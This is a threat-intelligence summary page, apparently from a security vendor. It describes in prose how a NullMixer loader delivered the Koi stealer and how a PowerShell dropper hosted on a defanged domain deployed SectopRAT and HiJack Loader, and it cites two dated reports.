Threat researchers documented multiple malware delivery chains using PowerShell-based loaders to fetch and execute credential theft and remote access payloads. In one campaign tied to NullMixer, a 32-bit loader masquerading as sqlcmd.exe pulled a script from a compromised WordPress site, decrypted an embedded .NET assembly, and launched the Koi stealer. Koi targeted credentials and data from browsers, FileZilla, Discord, Telegram, VPN clients, cryptocurrency wallets, and Twilio Authy, while also checking for Trezor hardware wallets; it used anti-analysis, anti-reinfection, and geofencing logic to avoid systems configured for several CIS countries.
A separate PowerShell dropper hosted on fancysunshine[.]top was used to deploy SectopRAT and HiJack Loader while attempting to weaken defenses and erase evidence. The script added Windows Defender exclusions for the C: drive and selected processes, downloaded NC.zip and RD.zip, unpacked them into fake Chrome cache directories under %TEMP%, and executed S-D.exe from both locations. It also gathered the victim's external IP address and username, checked for a scheduled task named MSSecurity, exfiltrated results to upload.php over HTTP POST, and then deleted the archives, extracted files, output data, and the dropper itself to reduce forensic visibility.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
2 events from the most recent confirmed update back to the earliest known activity.
A report published on 2025-06-22 described a PowerShell-based dropper delivered from fancysunshine[.]top that downloaded and executed payloads identified as SectopRAT and HiJack Loader. The script attempted defense evasion with Windows Defender exclusions, collected the victim's external IP and username, exfiltrated data to upload.php, and deleted artifacts to reduce forensic visibility.
An analysis published on 2023-03-28 documented the NullMixer campaign tracked as ATK-16 delivering a 32-bit MSVC loader named sqlcmd.exe, which fetched PowerShell from compromised infrastructure and ultimately deployed the Koi stealer. The report described Koi's credential and data theft capabilities, anti-analysis logic, CIS-region execution checks, C2 communications, and provided observables and YARA rules.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
2 references tracked. Mallory keeps watching after this page renders.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.